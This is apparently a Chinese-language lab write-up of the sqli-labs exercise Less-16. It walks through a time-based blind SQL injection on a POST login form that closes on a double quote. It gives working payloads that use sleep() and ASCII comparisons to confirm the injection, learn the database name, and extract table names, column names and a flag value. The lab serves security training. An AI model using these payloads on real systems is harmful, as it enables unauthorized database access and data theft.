Less-16

Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)

 本题使用延迟注入

1.判断是否存在注入

uname=a") or sleep(3) #&passwd=a&submit=Submit

延迟回显 => 存在注入

2.判断参数类型

uname=1 or sleep(3) #&passwd=a&submit=Submit

正常回显 => 字符型

3.进行参数闭合

uname=a") or sleep(3) #&passwd=a&submit=Submit

延迟回显 => 闭合成功

4.猜测数据库长度

uname=1") or if(length(database())=7,1,sleep(5)) #&passwd=a&submit=Submit

延迟回显

uname=1") or if(length(database())=8,1,sleep(5)) #&passwd=a&submit=Submit

正常回显 => 有8位

6.查看所在数据库

uname=1") or If(ascii(substr(database(),1,1))=114,1,sleep(5)) #&passwd=a&submit=Submit

延迟回显

uname=1") or If(ascii(substr(database(),1,1))=115,1,sleep(5)) #&passwd=a&submit=Submit

正常回显 => 第一位ascii=115

7.查看数据库的表

uname=1") or If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>1,1,sleep(3)) #&passwd=a&submit=Submit

8.查看users表中的列

uname=1") or If(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='ENR4qOJL' limit 0,1),1,1))>1,1,sleep(3)) #&passwd=a&submit=Submit

 9.查看表中的flag列中的数据

uname=1") or If(ascii(substr((select flag from ENR4qOJL limit 0,1),1,1))>1,1,sleep(3)) #&passwd=a&submit=Submit